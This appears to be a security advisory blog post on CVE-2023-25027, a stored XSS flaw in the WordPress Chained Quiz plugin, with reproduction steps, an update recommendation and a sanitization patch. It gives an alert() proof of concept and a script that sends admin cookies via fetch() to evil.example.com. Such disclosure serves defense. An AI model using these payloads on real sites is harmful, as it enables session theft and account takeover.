---

Introduction

If you use the Chained Quiz plugin by Kiboko Labs on your WordPress site, a severe security hole may put your users at risk. Known as CVE-2023-25027, this vulnerability lets an authenticated admin (or editor with equivalent rights) inject malicious JavaScript code—stored XSS (cross-site scripting)—in any site running plugin versions up to and including 1.3.2.5.

What Does "Stored XSS" Mean?

Unlike "reflected" XSS, where malicious code is briefly shown in a page (like in a search result), stored XSS is more dangerous: it lives in your database and runs every time someone visits the affected page. For a quiz plugin, this means anyone who visits or edits certain quiz fields could unintentionally run dangerous code injected by a rogue admin or compromised account.

Plugin Slug: chained-quiz

- WordPress.org page: https://wordpress.org/plugins/chained-quiz/

How the Vulnerability Works

The problem is with input fields (like questions and answers) not being properly sanitized when added/edited by a plugin admin. Simple HTML tags and scripts can be inserted and are later rendered "as-is" to other users with sufficient privileges.

A malicious (or compromised) admin logs into WordPress.

2. They create or edit a quiz, and insert XSS payload (like <script>alert('XSS!')</script>) in a question or answer field.
3. Any admin/editor that later views the quiz triggers the attack, running the JavaScript in their browser.

Step 1: Log in as an Admin

Go to your WordPress dashboard. Make sure you have the Chained Quiz plugin installed and active (<= 1.3.2.5).

Step 2: Add or Edit a Quiz

Navigate to Quizzes > Add New (or edit an existing one).

In any "Question" or "Answer" field, enter the following payload

<script>alert('CVE-2023-25027')</script>

*Screenshot:*

!Adding XSS payload to a quiz

Step 3: Trigger the Payload

Anytime someone with admin+ rights views or edits this quiz, the pop-up will appear. In a real attack, this could be used to:

- Steal cookies/session info

If you wanted to automatically grab admin cookies (very bad! For demo only), you could use

<script>
fetch('https://evil.example.com/steal?cookie='; + document.cookie);
</script>

Is There a Fix?

Yes. As of Chained Quiz version 1.3.2.6, input fields are sanitized using WordPress’s wp_kses_post and similar functions.

Update the plugin ASAP

- Limit admin/editor access to only trusted users

Developer Patch Example

If you want to manually patch (not recommended, update instead), use WordPress’s escaping/sanitization before saving and outputting fields:

$question = wp_kses_post($_POST['question']);
// Save $question to database

References & Further Reading

- Official WP Plugin Page
- NVD - CVE-2023-25027 Record
- WPScan Vulnerability Database Entry
- Kiboko Chained Quiz Changelog
- What is XSS? (OWASP)

Conclusion

Authenticated XSS vulnerabilities are some of the most damaging, as they use your platform’s own admin permissions against you. Even though only admins or editors can exploit CVE-2023-25027, once malicious code is injected, it can wreak havoc, steal sensitive info, or spread further.

Update your Chained Quiz plugin now to version 1.3.2.6 or later, and always follow WordPress’s advice for user permissions and plugin security.

*Stay safe—never trust user input, even if it’s from an admin!*

Timeline

Published on: 04/07/2023 11:15:00 UTC
Last modified on: 04/15/2023 02:24:00 UTC